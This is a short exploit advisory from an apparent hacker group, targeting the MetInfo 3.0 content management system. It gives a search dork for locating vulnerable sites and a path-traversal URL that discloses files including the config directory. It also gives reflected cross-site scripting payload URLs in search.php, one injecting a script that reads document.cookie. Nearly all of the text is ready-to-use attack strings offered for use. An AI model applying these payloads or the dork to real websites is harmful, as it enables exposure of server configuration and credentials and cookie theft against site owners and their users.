# Exploit Title: metinfo3.0 Mullti Vulnerability
 
# Date :       10-11-2010
 
# Author :    anT!-Tr0J4n
 
# Version :     3.0
 
#DorK     :    Powered by MetInfo 3.0
  
# Home    :    www.Dev-PoinT.com : http://milw0rm.ws
 
#Email     :    D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com
 
Vendor?   :   http://www.metinfo.cn/
 
#Greetz    :   Dev-PoinT.com   ; GlaDiatOr ;SILVER STAR ; HoBeeZ ; Coffin Of Evil ; Cyber-Err0r ; Mr.Mh$TEr ; M [Zero] ; R3d-D3v1l
 
#special thanks to milw0rm.ws team   :   r0073r,Sid3^effects,L0rd CruSad3r,SeeMe,Sonic,gunslinger_,Sn!pEr.S!Te,n4pst3rr,indoushka, KnocKout,SONiC,ZoRLu
 
 
========================================================
metinfo3.0 source code disclosure Vulnerability
========================================================
 
[>] exploit ->
 
[+] http://localhost/metinfo/templates/met001/../../ [file disclosure]
 
EX :
 
[+] http://localhost/metinfo/templates/met001/../../config
 
 
======================================================
[>] metinfo3.0 XSS Vulnerability
======================================================
 
[>] exploit -> XSS Vulnerability
 
 
http://localhost/metinfo/search/search.php?lang=en&class1=0&class2=0&class3=0&searchtype=0&searchword=[XSS]
 
 
http://localhost/metinfo/search/search.php?lang=en&class1=0&class2=0&class3=0&searchtype=0&searchword=1<script>alert(document.cookie)</script>
 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 
[+] Site               : Inj3ct0r.com
[+] Support e-mail  : submit[at]inj3ct0r.com
[+] I'm anT!-Tr0J4n member from Inj3ct0r Team